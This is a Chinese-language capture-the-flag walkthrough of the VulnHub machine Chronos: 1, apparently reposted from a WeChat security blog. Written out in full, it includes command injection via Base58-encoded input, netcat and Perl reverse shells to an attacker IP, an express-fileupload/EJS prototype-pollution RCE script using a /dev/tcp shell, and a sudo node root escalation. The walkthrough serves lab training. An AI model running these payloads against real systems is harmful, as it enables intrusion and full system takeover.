0x01 靶机介绍
-
Name: Chronos: 1
-
Date release: 9 Aug 2021
-
Author: AL1ENUM
-
Series: Chronos
-
Difficulty : medium
靶机下载地址:
https://www.vulnhub.com/entry/chronos-1,735/0x02 侦察
nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_chronos
访问http://192.168.0.106:8000界面如下
gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirb/big.txt -x phpgobuster dir -u http://192.168.0.106:8000 -w /usr/share/wordlists/dirb/big.txt -x php
0x03 上线【WWW.data】
http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyLvar _0x5bdf = ['150447srWefj', '70lwLrol', '1658165LmcNig', 'open', '1260881JUqdKM', '10737CrnEEe', '2SjTdWC', 'readyState', 'responseText', '1278676qXleJg', '797116soVTES', 'onreadystatechange', 'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL', 'User-Agent', 'status', '1DYOODT', '400909Mbbcfr', 'Chronos', '2QRBPWS', 'getElementById', 'innerHTML', 'date'];(function (_0x506b95, _0x817e36) {var _0x244260 = _0x432d;while (!![]) {try {var _0x35824b = -parseInt(_0x244260(0x7e)) * parseInt(_0x244260(0x90)) + parseInt(_0x244260(0x8e)) + parseInt(_0x244260(0x7f)) * parseInt(_0x244260(0x83)) + -parseInt(_0x244260(0x87)) + -parseInt(_0x244260(0x82)) * parseInt(_0x244260(0x8d)) + -parseInt(_0x244260(0x88)) + parseInt(_0x244260(0x80)) * parseInt(_0x244260(0x84));if (_0x35824b === _0x817e36) break;else _0x506b95['push'](_0x506b95['shift']());} catch (_0x3fb1dc) {_0x506b95['push'](_0x506b95['shift']());}}}(_0x5bdf, 0xcaf1e));function _0x432d(_0x16bd66, _0x33ffa9) {return _0x432d = function (_0x5bdf82, _0x432dc8) {_0x5bdf82 = _0x5bdf82 - 0x7e;var _0x4da6e8 = _0x5bdf[_0x5bdf82];return _0x4da6e8;}, _0x432d(_0x16bd66, _0x33ffa9);}function loadDoc() {var _0x17df92 = _0x432d,_0x1cff55 = _0x17df92(0x8f),_0x2beb35 = new XMLHttpRequest();_0x2beb35[_0x17df92(0x89)] = function () {var _0x146f5d = _0x17df92;this[_0x146f5d(0x85)] == 0x4 && this[_0x146f5d(0x8c)] == 0xc8 && (document[_0x146f5d(0x91)](_0x146f5d(0x93))[_0x146f5d(0x92)] = this[_0x146f5d(0x86)]);}, _0x2beb35[_0x17df92(0x81)]('GET', _0x17df92(0x8a), !![]), _0x2beb35['setRequestHeader'](_0x17df92(0x8b), _0x1cff55), _0x2beb35['send']();}
在本地修改域名解析
vim /etc/hosts# 配置192.168.0.106 chronos.local
利用 CyberChef 解码
4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL,通过 Base58 解码为'+Today is %A, %B %d, %Y %H:%M:%S.'
配合 date 命令成功转换,在此处可能存在命令执行
经测试发现以下符号可以在date后执行
; | & &&选择;符号经 base58 编码执行命令,命令执行成功
;ls#base58编码后Lxfc
但执行 whoami 命令则提示报错,说明该命令被过滤
查看/bin目录下文件,成功发现bash、nc、netcat、perl
;ls /bin/#编码后AwV43iiVT6M
nc -nvlp 5555nc -nvlp 6666
由于 nc 没有-e参数,因此就需要开启两个nc,第一个nc作为输入口,第二个nc作为输出口
;nc 192.168.0.107 5555 | /bin/bash | nc 192.168.0.107 6666#编码后YMbm2Ph6yCH4ARYAKXLRZsvbVsx9SDRcyY7aenyYrhN1ZFW3z2JQ9RyL279DNyY9iunhprxRftZhS1K
参考地址:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet;perl -e 'use Socket;$i="192.168.0.107";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'#编码后36XPmnAxYmYfBgAwvweNZ1cbPjxJiupGFJPVmbURWFdCnYzb4m9PPtjMPLAtAfgWgnoRa9kWNNJYMQmHXYjL12W3pn6C9YMhL458mxbQoiQRAfvkXKV5q9gTW9JVQp5YsBjFduuiKuJtVDSMS76uyQTaZcPAFtTS8xwg6pY7CnYmqYMeyXRC5xkQVQwKmVteMo51wYn3RPq8QzjgCjA94ZiZtz8jUF1xeiLX1nd5NeN78MP43mfQLax1beRRFDprPYmC49gi2NcNzLaAU4K4rVh9rLR2MpyVKp1JrvvM6cN3F2cYn
在本地监听1234端口
nc -nvlp 1234成功拿到反弹shell,查看user.txt但提示无权限
python3 -c 'import pty;pty.spawn("/bin/bash")'
0x04 权限提升【imera】
if (agent === 'Chronos') {if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {res.send("Something went wrong");}exec(concat, (error, stdout, stderr) => {if (error) {console.log(`error: ${error.message}`);return;}if (stderr) {console.log(`stderr: ${stderr}`);return;}res.send(stdout);});}
同时发现/opt目录下还存在chronos-v2目录,经搜索发现其下backend目录下存在server.js
const express = require('express');const fileupload = require("express-fileupload");const http = require('http')const app = express();app.use(fileupload({parseNested: true}));app.set('view engine', 'ejs');app.set('views', "/opt/chronos-v2/frontend/pages");app.get('/', (req, res) => {res.render('index')});const server = http.Server(app);const addr = "127.0.0.1"const port = 8080;server.listen(port, addr, () => {console.log('Server listening on ' + addr + ' port ' + port);});
经代码分析可知其在本地侦听8080端口,呈现索引文件/opt/chronos-v2/frontend/pages,调用模块express和express-fileupload。在谷歌中搜索相关漏洞,成功发现远程代码执行漏洞
node express-fileupload exploit
https://dev.to/boiledsteak/simple-remote-code-execution-on-ejs-web-applications-with-express-fileupload-3325############################################################### Run this .py to perform EJS-RCE attack# referenced from# https://blog.p6.is/Real-World-JS-1/## Timothy, 10 November 2020################################################################# importsimport requests### commands to run on victim machinecmd = 'bash -c "bash -i &> /dev/tcp/192.168.0.107/7777 0>&1"'print("Starting Attack...")### polluterequests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})### execute commandrequests.get('http://127.0.0.1:8080')print("Finished!")
在本地开启 http 服务
python -m SimpleHTTPServer 80
进入/tmp目录下通过 wget 命令下载exploit.py并执行
cd /tmpwget http://192.168.0.107/exploit.pypython3 exploit.py
在本地监听7777端口,成功拿到反弹shell
nc -nvlp 7777在当前用户家目录下拿到第一个flag
cat user.txt
0x05 权限提升【ROOT】
sudo -l
利用 node 执行 sudo 命令提权,成功提权为root
sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'在家目录下成功拿到第二个flag
cat root.txt
0x06 知识星球
原文始发于微信公众号(狐狸说安全):Vulnhub Chronos-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论